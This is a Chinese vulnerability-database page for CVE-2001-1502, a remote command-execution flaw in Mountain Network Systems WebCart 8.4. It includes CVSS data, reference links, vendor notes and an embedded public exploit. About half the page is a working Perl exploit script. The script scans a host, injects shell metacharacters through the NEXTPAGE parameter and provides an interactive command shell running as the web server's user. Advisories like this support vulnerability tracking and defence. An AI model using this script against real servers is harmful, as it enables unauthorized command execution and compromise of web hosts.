CVE-2001-1502
CVSS7.5
发布时间 :2001-12-31 00:00:00
修订时间 :2008-09-05 16:26:43
NMCOE    

[原文]webcart.cgi in Mountain Network Systems WebCart 8.4 allows remote attackers to execute arbitrary commands via shell metacharacters in the NEXTPAGE parameter.


[CNNVD]Mountain Network Systems WebCart远程命令执行漏洞(CNNVD-200112-220)

        
        Mountain Network Systems WebCart是一款基于CGI的在线购物程序。
        包含的webcart.cgi脚本由于对用户提交的参数缺少充分过滤,远程攻击者可以利用这个漏洞以Web权限在系统上执行任意命令。
        webcart.cgi对NEXTPAGE参数缺少充分过滤,攻击者提交包含元字符的数据给NEXTPAGE参数,可导致以WEB进程权限执行任意命令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1502
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1502
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200112-220
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/7315
(UNKNOWN)  XF  webcart-cgi-command-execution(7315)
http://www.securityfocus.com/bid/3453
(UNKNOWN)  BID  3453
http://www.securityfocus.com/archive/1/221688
(UNKNOWN)  BUGTRAQ  20011019 Webcart v.8.4

- 漏洞信息

Mountain Network Systems WebCart远程命令执行漏洞
高危 输入验证
2001-12-31 00:00:00 2006-01-27 00:00:00
远程  
        
        Mountain Network Systems WebCart是一款基于CGI的在线购物程序。
        包含的webcart.cgi脚本由于对用户提交的参数缺少充分过滤,远程攻击者可以利用这个漏洞以Web权限在系统上执行任意命令。
        webcart.cgi对NEXTPAGE参数缺少充分过滤,攻击者提交包含元字符的数据给NEXTPAGE参数,可导致以WEB进程权限执行任意命令。
        

- 公告与补丁

        厂商补丁:
        Mountain Network Systems Inc.
        -----------------------------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.mountain-net.com/ecom.htm

- 漏洞信息 (21125)

Mountain Network Systems WebCart 8.4 Command Execution Vulnerability (EDBID:21125)
cgi remote
2001-10-19 Verified
0 root@xpteam.f2s.com
N/A [点击下载]
source: http://www.securityfocus.com/bid/3453/info

Mountain Network Systems WebCart is a cgi based online shopping suite. An error in the webcart.cgi script allows a remote user to pass an arbitrary shell command which will be executed by the script. 

#####################################################
# WebCart exploit
# Spawn bash style Shell with webserver uid
#
# Spabam 2003 PRIV8 code
# #hackarena irc.brasnet.org
# This Script is currently under development
#####################################################
use strict;
use IO::Socket;
my $host;
my $port;
my $command;
my $url;
my @results;
my $probe;
my @U;
my $shit;
$U[1] = "/cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;";
&intro;
&scan;
&choose;
&command;
&exit;
sub intro {
&help;
&host;
&server;
sleep 3;
};
sub host {
print "\nHost or IP : ";
$host=<STDIN>;
chomp $host;
if ($host eq ""){$host="127.0.0.1"};
$shit="|&CODE=PHOLD";
$port="80";
chomp $port;
if ($port =~/\D/ ){$port="80"};
if ($port eq "" ) {$port = "80"};
};
sub server {
my $X;
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
$probe = "string";
my $output;
my $webserver = "something";
&connect;
for ($X=0; $X<=10; $X++){
	$output = $results[$X];
	if (defined $output){
	if ($output =~/Apache/){ $webserver = "Apache" };
	};
};
if ($webserver ne "Apache"){
my $choice = "y";
chomp $choice;
if ($choice =~/N/i) {&exit};
            }else{
print "\n\nOK";
	};		
};  
sub scan {
my $status = "not_vulnerable";
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
my $loop;
my $output;
my $flag;
$command="dir";
for ($loop=1; $loop < @U; $loop++) { 
$flag = "0";
$url = $U[$loop];
$probe = "scan";
&connect;
foreach $output (@results){
if ($output =~ /Directory/) {
                              $flag = "1";
			      $status = "vulnerable";
			      };
	};
if ($flag eq "0") { 
}else{
     };
};
if ($status eq "not_vulnerable"){

				};
};
sub choose {
my $choice="0";
chomp $choice;
if ($choice > @U){ &choose };
if ($choice =~/\D/g ){ &choose };
if ($choice == 0){ &other };
$url = $U[$choice];
};
sub other {
my $other = "/cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;";
chomp $other;
$U[0] = $other;
};
sub command {
while ($command !~/quit/i) {
print "\n[$host]\$ ";
$command = <STDIN>;
chomp $command;
if ($command =~/quit/i) { &exit };
if ($command =~/url/i) { &choose }; 
if ($command =~/scan/i) { &scan };
if ($command =~/help/i) { &help };
$command =~ s/\s/+/g; 
$probe = "command";
if ($command !~/quit|url|scan|help/) {&connect};
};
&exit;
};  
sub connect {
my $connection = IO::Socket::INET->new (
				Proto => "tcp",
				PeerAddr => "$host",
				PeerPort => "$port",
				) or die "\nSorry UNABLE TO CONNECT To $host On Port $port.\n";
$connection -> autoflush(1);
if ($probe =~/command|scan/){
print $connection "GET $url$command$shit HTTP/1.0\r\n\r\n";
}elsif ($probe =~/string/) {
print $connection "HEAD / HTTP/1.0\r\n\r\n";
};

while ( <$connection> ) { 
			@results = <$connection>;
			 };
close $connection;
if ($probe eq "command"){ &output };
if ($probe eq "string"){ &output };
};  
sub output{
my $display;
if ($probe eq "string") {
			my $X;
			for ($X=0; $X<=10; $X++) {
			$display = $results[$X];
			if (defined $display){print "$display";};
			sleep 1;
				};
			}else{
			foreach $display (@results){
			    print "$display";
			    sleep 1;
				};
                          };
};  
sub exit{
print "\n\n\n
SPABAM 2003.";
print "\n\n\n";
exit;
};
sub help {
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
print "\n
        WebCart.pl v1.0 by SPABAM 2003";
print "\n
";
print "\n WebCart Exploit";
print "\n 

note.. web directory is normally /var/www/html";
print "\n";
print "\n Host: www.victim.com or xxx.xxx.xxx.xxx (RETURN for 127.0.0.1)";
print "\n\n\n\n\n\n\n\n\n\n\n\n";
};
		

- 漏洞信息

2087
Mountain Network Systems webcart.cgi NEXTPAGE Parameter Arbitrary Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

The Mountain Network Systems webcart.cgi script allows a remote attacker to execute arbitrary commands. The issue is due to the script not validating input supplied to the NEXTPAGE parameter. By using a carefully constructed URL, an attacker can execute any command on the remote system.

- 时间线

2001-10-18 Unknow
2001-10-18 Unknow

- 解决方案

Upgrade to version 2003 Professional or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站